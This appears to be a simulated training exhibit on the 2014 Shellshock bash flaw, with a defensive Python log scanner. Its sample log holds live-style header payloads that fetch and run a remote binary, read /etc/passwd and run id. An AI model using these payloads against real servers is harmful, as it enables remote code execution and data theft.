Archive
EXH-012
2014
Fictional reconstruction

Envoi

September 24, 2014. Someone realises that bash, when it imports an exported function definition from an environment variable, keeps executing whatever text follows the function body. CGI copies every request header into the script's environment, so a crafted `User-Agent` becomes shell commands the moment a CGI script is bash, or calls anything through `/bin/sh` on a box where `/bin/sh` is bash. That describes a large share of the web's servers.

Type: Classic
Difficulty: Intermediate
Era: 2010s
Time: 9 min

Briefing

Apache still has `/cgi-bin/` turned on for some PHP-era apps, and CGI hands request headers to each script as `HTTP_*` environment variables. Attackers probe with crafted `User-Agent`/`Cookie` values that start with `() { :; };` and carry their real command after the closing brace. Your job is log forensics only.

Your role

On-call engineer triaging a botnet's sweep through your leftover CGI directory.

Objective

Recognise the CVE-2014-6271 pattern in access logs and tie it to the way bash imported exported function definitions from environment variables.
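The check the briefing and objective describe, as an added example that is not part of the exhibit's own materials: a small Python scanner that parses Apache combined-format lines, looks for the `() { ... };` trigger in the header-derived fields, and pulls out the trailing command so the analyst can see what the bot was trying to run. The log lines are constructed for this example (RFC 5737 documentation addresses, a hypothetical `/cgi-bin/status` script); the field names and thresholds are assumptions, not anything from the exhibit.

```python
import re
from typing import Dict, List, Optional

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
# Note that Cookie is NOT in this format; a probe carried only in a Cookie
# header is invisible unless the LogFormat also includes %{Cookie}i.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# CVE-2014-6271 trigger: a value shaped like an exported function definition
# "() { ... }" followed by more text. Vulnerable bash defined the function and
# then kept parsing, executing whatever came after the body. \s* tolerates the
# spacing variants seen in probes ("() { :; };", "() { :;};", "() {:;};").
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<payload>.*)$')

# Constructed sample log (not from any real server). Three probes, one benign hit.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Sep/2014:14:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; /bin/bash -c 'wget http://203.0.113.7/x -O /tmp/x; chmod +x /tmp/x; /tmp/x'"
198.51.100.23 - - [24/Sep/2014:14:02:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { :;}; echo; /bin/cat /etc/passwd" "Mozilla/5.0"
192.0.2.44 - - [24/Sep/2014:14:02:13 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [24/Sep/2014:14:02:14 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { ignored; }; echo Content-Type: text/plain; echo; /usr/bin/id"
"""


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields, or None if it does not parse."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def shellshock_payload(value: str) -> Optional[str]:
    """Return the command tail of a Shellshock-style header value, or None."""
    m = SHELLSHOCK_RE.search(value)
    return m.group("payload").strip() if m else None


def scan(log_text: str) -> List[Dict[str, str]]:
    """Flag requests whose header-derived fields carry the CVE-2014-6271 trigger."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        # Only header-derived fields become attacker-controlled env vars under
        # CGI (HTTP_USER_AGENT, HTTP_REFERER, and HTTP_COOKIE if you log it).
        for field in ("ua", "referer"):
            payload = shellshock_payload(rec[field])
            if payload is None:
                continue
            hits.append({
                "host": rec["host"],
                "time": rec["time"],
                "request": rec["request"],
                "status": rec["status"],
                "field": field,
                "payload": payload,
                # A probe against a CGI path that returned 200 is the one to chase;
                # the same string aimed at a static file or PHP page is just noise.
                "cgi_hit": "yes" if "/cgi-bin/" in rec["request"] and rec["status"] == "200" else "no",
            })
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f'{h["time"]} {h["host"]} {h["request"]} [{h["field"]}] cgi_hit={h["cgi_hit"]}: {h["payload"]}')
```

Two caveats when you run something like this against real logs: a 200 response proves the CGI script ran, not that the payload did anything, so follow up on the target host (outbound connections, new files under `/tmp`, processes spawned by the web server user); and the access log only shows headers the `LogFormat` records, so if `Cookie` or `Referer` are not logged the sweep may be larger than it looks. To confirm whether a given bash binary is affected at all, the well-known check is `env x='() { :;}; echo vulnerable' bash -c 'echo test'`: a patched bash prints only `test`.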

Terminal environment

user: responder
host: apache-bridge
cwd: /var/log/www-legacy
steps: 3

Safety note. This is a safe reconstruction. All systems, files, hosts, credentials, and outputs are simulated. Do not use these techniques on systems you do not own or have explicit permission to test.